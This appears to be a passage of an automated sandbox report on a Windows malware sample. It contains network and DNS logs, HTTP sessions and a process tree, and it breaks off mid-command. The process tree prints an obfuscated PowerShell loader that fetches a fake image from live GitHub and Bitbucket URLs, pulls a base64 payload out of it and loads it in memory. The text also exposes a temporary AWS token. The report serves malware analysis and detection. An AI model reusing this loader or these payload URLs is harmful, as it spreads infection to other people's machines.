Sep 26, 2024 12:16:30.699033976 CEST  443    49738  52.216.210.153   192.168.2.4
Sep 26, 2024 12:16:30.699047089 CEST  443    49738  52.216.210.153   192.168.2.4
Sep 26, 2024 12:16:30.699073076 CEST  49738  443    192.168.2.4      52.216.210.153
Sep 26, 2024 12:16:30.699101925 CEST  49738  443    192.168.2.4      52.216.210.153
Sep 26, 2024 12:16:30.699433088 CEST  49738  443    192.168.2.4      52.216.210.153
Sep 26, 2024 12:16:33.208069086 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:33.213098049 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:33.213177919 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:33.221570969 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:33.226408005 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:33.883621931 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:33.921233892 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:33.926067114 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:34.112550974 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:34.162520885 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:39.174086094 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:39.180063963 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:39.737417936 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:39.737438917 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:39.737452030 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:39.737463951 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:39.737476110 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:39.737487078 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:39.737523079 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:39.896811008 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.150221109 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155210972 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155251026 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155278921 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155284882 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155313015 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155313969 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155335903 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155343056 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155360937 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155375957 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155388117 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155416012 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155424118 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155452013 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155467987 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155478954 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155497074 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155510902 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.155520916 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.155549049 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.160290003 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.160392046 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.160418987 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.160449028 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165076017 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165103912 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165131092 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165157080 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165183067 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165209055 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165235043 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165260077 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.165286064 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.484795094 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.485594988 CEST  49739  6302   192.168.2.4      185.196.9.26
Sep 26, 2024 12:16:41.490529060 CEST  6302   49739  185.196.9.26     192.168.2.4
Sep 26, 2024 12:16:41.711421967 CEST  6302   49739  185.196.9.26     192.168.2.4
                                                                    Sep 26, 2024 12:16:41.769349098 CEST497396302192.168.2.4185.196.9.26
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 12:16:22.306884050 CEST | 54958 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 12:16:22.314162970 CEST | 53 | 54958 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 12:16:28.202207088 CEST | 53418 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 12:16:28.209585905 CEST | 53 | 53418 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 12:16:29.531461000 CEST | 60482 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 12:16:29.553848982 CEST | 53 | 60482 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 12:16:22.306884050 CEST | 192.168.2.4 | 1.1.1.1 | 0x7378 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:28.202207088 CEST | 192.168.2.4 | 1.1.1.1 | 0xbaeb | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.531461000 CEST | 192.168.2.4 | 1.1.1.1 | 0x99e1 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 12:16:22.314162970 CEST | 1.1.1.1 | 192.168.2.4 | 0x7378 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:22.314162970 CEST | 1.1.1.1 | 192.168.2.4 | 0x7378 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:22.314162970 CEST | 1.1.1.1 | 192.168.2.4 | 0x7378 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:22.314162970 CEST | 1.1.1.1 | 192.168.2.4 | 0x7378 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:28.209585905 CEST | 1.1.1.1 | 192.168.2.4 | 0xbaeb | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:28.209585905 CEST | 1.1.1.1 | 192.168.2.4 | 0xbaeb | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:28.209585905 CEST | 1.1.1.1 | 192.168.2.4 | 0xbaeb | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.210.153 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.137 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.164.241 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.209.225 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.7.110 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.210.57 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.154.212 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 12:16:29.553848982 CEST | 1.1.1.1 | 192.168.2.4 | 0x99e1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.99 | A (IP address) | IN (0x0001) | false
• raw.githubusercontent.com
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.199.109.133 | 443 | 7664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 10:16:23 UTC | 117 | OUT | GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-09-26 10:16:23 UTC | 888 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 2578503
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: image/jpeg
ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 50C2:20FE55:4D64F4:53D4ED:66F53476
Accept-Ranges: bytes
Date: Thu, 26 Sep 2024 10:16:23 GMT
Via: 1.1 varnish
X-Served-By: cache-nyc-kteb1890039-NYC
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1727345783.091165,VS0,VE53
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 3b71ff962979e50593e69e4dbc64c549cda02ad7
Expires: Thu, 26 Sep 2024 10:21:23 GMT
Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 185.166.143.49 | 443 | 7664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 10:16:28 UTC | 101 | OUT | GET /rulmerurk/ertertqw/downloads/wil25.txt HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2024-09-26 10:16:29 UTC | 5101 | IN | HTTP/1.1 302 Found
Date: Thu, 26 Sep 2024 10:16:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MD [TRUNCATED]
Expires: Thu, 26 Sep 2024 10:16:29 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 0b630014adf4
X-Version: c76eeb855613
X-Static-Version: c76eeb855613
X-Request-Count: 1948
X-Render-Time: 0.04727768898010254
X-B3-Traceid: e7c7f418a9b2451ba66a87318177f589
X-B3-Spanid: 878379fb0a93e386
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east- [TRUNCATED]
X-Usage-Quota-Remaining: 999208.540
X-Usage-Request-Cost: 805.47
X-Usage-User-Time: 0.024164
X-Usage-System-Time: 0.000000
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: e7c7f418a9b2451ba66a87318177f589
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=158,atl-edge-internal;dur=4,atl-edge-upstream;dur=156,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 52.216.210.153 | 443 | 7664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 10:16:30 UTC | 1195 | OUT | GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MDitjsvOKoKbCZYTOy3DolPfQ0bBGLHd6yaQTd5gEe7F1Z [TRUNCATED]
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
2024-09-26 10:16:30 UTC | 524 | IN | HTTP/1.1 200 OK
x-amz-id-2: wTj/nttpnfZA2tC6ZbkHOWlIaZTHfl4D2cD6Ng5x6FF3i/CnQtTW+iZdt+HJvEJXY9RKiGqOXHs=
x-amz-request-id: 124NK3VKP0VZB8RW
Date: Thu, 26 Sep 2024 10:16:31 GMT
Last-Modified: Wed, 25 Sep 2024 13:45:09 GMT
ETag: "028458cd59a8b2ba0acffa44917291ec"
x-amz-server-side-encryption: AES256
x-amz-version-id: NCUeYawyYfNICzupzESmWap3AG2OAmMr
Content-Disposition: attachment; filename="wil25.txt"
Accept-Ranges: bytes
Content-Type: text/plain
Server: AmazonS3
Content-Length: 422052
Connection: close



                                                                    Target ID:0
                                                                    Start time:06:16:08
                                                                    Start date:26/09/2024
                                                                    Path:C:\Users\user\Desktop\sRMytgfRpJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\sRMytgfRpJ.exe"
                                                                    Imagebase:0x7ff7d6fd0000
                                                                    File size:165'376 bytes
                                                                    MD5 hash:51C009ABF871216F8D9E40CDD785CE6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:06:16:08
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /c fqt.vbs
                                                                    Imagebase:0x7ff620470000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:06:16:08
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:06:16:09
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
                                                                    Imagebase:0x7ff7c7a00000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:06:16:09
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##
I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#